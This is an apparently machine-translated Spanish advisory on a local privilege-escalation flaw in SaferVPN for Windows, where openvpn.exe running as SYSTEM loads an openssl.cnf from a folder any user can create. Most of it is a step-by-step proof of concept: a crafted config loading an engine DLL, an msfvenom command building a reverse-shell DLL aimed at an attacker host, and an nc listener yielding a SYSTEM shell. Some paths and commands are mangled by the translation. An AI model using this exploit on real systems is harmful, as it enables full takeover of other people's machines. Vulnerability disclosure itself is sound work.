SaferVPN para Windows Ver 5.0.3.3 a 5.0.4.15 podría permitir la escalada de privilegios locales de usuarios con pocos privilegios al SISTEMA a través de un archivo de configuración openssl diseñado
Cuando SaferVPN intenta conectarse a un servidor VPN, genera openvpn.exe ( C:\Program Files (x86)\SaferVPN for Windows\bin\openvpn.exe) en el contexto de NT AUTHORITY \ SYSTEM. Intenta cargar un archivo de configuración openssl.cnf desde una carpeta que no existe (C: \ etc \ ssl \ openssl.cnf). Debido a que un usuario con pocos privilegios puede crear carpetas en C: \, es posible que el usuario cree la ruta adecuada y coloque el archivo openssl.cnf creado en ella. Una vez que se inicia el servicio openvpn.exe, el archivo openssl.cnf cargará una biblioteca de motor OpenSSL maliciosa que dará como resultado la ejecución de código arbitrario como SYSTEM.
Versión afectada: SaferVPN for Windows desde la versión 5.0.3.3 a la más reciente (que es 5.0.4.15 partir del 12 de Ene, 2021)
Prueba de concepto
1. Cree un archivo de configuración openssl.cnf con el siguiente contenido.
openssl_conf = openssl_init
[openssl_init]
engines = engine_section[engine_section]
root = root_section[root_section]
engine_id = root
dynamic_path = c:\\etc\\ssl\\root.dll
init = 0
2. Genere una dll maliciosa usando msfvenom (un shell inverso en este caso)
msfvenom -p windows / shell_reverse_tcp LHOST = [attacker_ip] LPORT = [attacker_port] -f dll> root.dll
3. Cree la siguiente carpeta y subcarpetas en C: \.
mkdir C: \ etc \ ssl
4. Coloque el archivo openssl.cnf creado en el paso 1 y el archivo root.dll creado en el paso 2 en C: \ etc \ ssl \.
5. Configurar un oyente en el cuadro de ataque
nc -lvnp [attacker_port]
6. Haga clic en el botón Conectar en la aplicación SaferVPN para Windows, debería recibir un shell del SISTEMA
Referencias:
Gracias por visitar este sitio, espero que te haya gustado y vuelvas proximamente, compartela en las redes sociales, gracias
